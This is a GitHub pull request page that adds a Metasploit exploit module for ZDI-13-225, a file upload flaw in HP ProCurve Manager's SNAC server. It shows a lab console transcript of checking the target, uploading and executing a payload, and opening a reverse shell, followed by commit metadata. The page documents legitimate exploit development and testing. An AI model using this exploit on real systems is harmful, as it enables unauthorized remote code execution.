Add module for ZDI-13-225 #2366

jvazquez-r7 · 2013-09-13T22:34:19Z

Tested with the SNAC server included with HP PCM 4.0

msf > use exploit/windows/http/hp_pcm_snac_update_certificates 
msf exploit(hp_pcm_snac_update_certificates) > set rhost 192.168.172.244
rhost => 192.168.172.244
msf exploit(hp_pcm_snac_update_certificates) > check
[*] The target appears to be vulnerable.
msf exploit(hp_pcm_snac_update_certificates) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.244:443 - Getting a valid session...
[*] 192.168.172.244:443 - Uploading payload...
[*] 192.168.172.244:443 - Executing payload...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.244:2552) at 2013-09-13 17:32:54 -0500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Hewlett-Packard\PCM\snac\bin>exit
exit

[*] 192.168.172.244 - Command shell session 1 closed.  Reason: Died from EOFError

msf exploit(hp_pcm_snac_update_certificates) > exit -y

…Upload

jvazquez-r7 added 3 commits September 13, 2013 16:40

Add module for ZDI-13-225

f7c4e08

Add check function

dca4351

Delete debug print_status

10303a8

wchen-r7 added a commit that referenced this pull request Sep 16, 2013

Land #2366 - HP ProCurve Manager SNAC UpdateCertificatesServlet File …

67cd62f

…Upload

wchen-r7 merged commit 10303a8 into rapid7:master Sep 16, 2013

jvazquez-r7 deleted the zdi_13_225 branch November 18, 2014 15:59

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Add module for ZDI-13-225 #2366

Add module for ZDI-13-225 #2366

jvazquez-r7 commented Sep 13, 2013

Add module for ZDI-13-225 #2366

Add module for ZDI-13-225 #2366

Conversation

jvazquez-r7 commented Sep 13, 2013